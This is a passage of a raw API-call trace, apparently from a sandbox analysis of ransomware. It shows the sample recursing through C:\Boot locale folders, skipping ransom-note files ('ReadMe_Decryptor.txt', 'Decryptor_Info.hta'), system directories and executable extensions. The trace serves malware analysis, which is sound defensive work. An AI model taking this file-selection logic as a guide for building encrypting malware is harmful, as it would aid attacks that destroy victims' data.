ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.393] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.393] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.393] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.393] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.394] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.394] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.394] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.394] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.394] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.394] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x729610 [0106.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b00a8 [0106.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x729610 | out: hHeap=0x6d0000) returned 1 [0106.394] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0138 [0106.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00a8 | out: hHeap=0x6d0000) returned 1 [0106.394] FindNextFileW (in: hFindFile=0x758c08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.394] FindClose (in: hFindFile=0x758c08 | out: hFindFile=0x758c08) returned 1 [0106.394] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0106.394] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0106.394] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0106.394] lstrlenW (lpString="pt-BR") returned 5 [0106.395] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pt-BR" | out: lpString1="C:\\Boot\\pt-BR") returned="C:\\Boot\\pt-BR" [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Windows") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\ProgramData") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Intel") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\msys32") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Qt") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\ProgramData") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Program Files") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Windows") returned -1 [0106.395] lstrcmpiW (lpString1="C:\\Boot\\pt-BR", lpString2="C:\\Program Files (x86)") returned -1 [0106.396] lstrcatW (in: lpString1="C:\\Boot\\pt-BR", lpString2="\\" | out: lpString1="C:\\Boot\\pt-BR\\") returned="C:\\Boot\\pt-BR\\" [0106.396] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0106.396] FindFirstFileExW (in: lpFileName="C:\\Boot\\pt-BR\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.442] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.444] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.444] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.444] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.444] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.444] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.444] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.444] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.444] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.444] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.444] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.445] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.445] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.445] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02e8 [0106.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.445] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.445] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.445] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0106.445] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0106.445] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0106.445] lstrlenW (lpString="pt-PT") returned 5 [0106.445] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pt-PT" | out: lpString1="C:\\Boot\\pt-PT") returned="C:\\Boot\\pt-PT" [0106.445] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Windows") returned -1 [0106.445] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\ProgramData") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Intel") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\msys32") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Qt") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\ProgramData") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Program Files") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Windows") returned -1 [0106.446] lstrcmpiW (lpString1="C:\\Boot\\pt-PT", lpString2="C:\\Program Files (x86)") returned -1 [0106.446] lstrcatW (in: lpString1="C:\\Boot\\pt-PT", lpString2="\\" | out: lpString1="C:\\Boot\\pt-PT\\") returned="C:\\Boot\\pt-PT\\" [0106.446] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0106.446] FindFirstFileExW (in: lpFileName="C:\\Boot\\pt-PT\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.447] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.447] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.447] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.447] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.447] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.447] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.447] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.447] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.447] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.447] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.447] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.447] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.447] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.448] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.448] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.448] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.448] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0330 [0106.448] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.448] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.448] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.448] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0106.448] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0106.448] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0106.448] lstrlenW (lpString="ru-RU") returned 5 [0106.448] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ru-RU" | out: lpString1="C:\\Boot\\ru-RU") returned="C:\\Boot\\ru-RU" [0106.448] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Windows") returned -1 [0106.448] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.448] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.448] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\ProgramData") returned -1 [0106.448] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.448] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.448] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Intel") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\msys32") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Qt") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\ProgramData") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Program Files") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Windows") returned -1 [0106.449] lstrcmpiW (lpString1="C:\\Boot\\ru-RU", lpString2="C:\\Program Files (x86)") returned -1 [0106.449] lstrcatW (in: lpString1="C:\\Boot\\ru-RU", lpString2="\\" | out: lpString1="C:\\Boot\\ru-RU\\") returned="C:\\Boot\\ru-RU\\" [0106.449] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0106.449] FindFirstFileExW (in: lpFileName="C:\\Boot\\ru-RU\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.451] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.451] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.451] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.451] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.451] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.451] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.451] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.451] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.451] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.451] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.451] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.451] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.452] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.452] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.452] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.452] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0378 [0106.452] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.452] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.452] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.452] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0106.452] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0106.452] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0106.452] lstrlenW (lpString="sv-SE") returned 5 [0106.452] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="sv-SE" | out: lpString1="C:\\Boot\\sv-SE") returned="C:\\Boot\\sv-SE" [0106.452] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Windows") returned -1 [0106.452] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.452] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.452] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\ProgramData") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Intel") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\msys32") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Qt") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\ProgramData") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Program Files") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Windows") returned -1 [0106.453] lstrcmpiW (lpString1="C:\\Boot\\sv-SE", lpString2="C:\\Program Files (x86)") returned -1 [0106.453] lstrcatW (in: lpString1="C:\\Boot\\sv-SE", lpString2="\\" | out: lpString1="C:\\Boot\\sv-SE\\") returned="C:\\Boot\\sv-SE\\" [0106.453] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0106.453] FindFirstFileExW (in: lpFileName="C:\\Boot\\sv-SE\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.454] 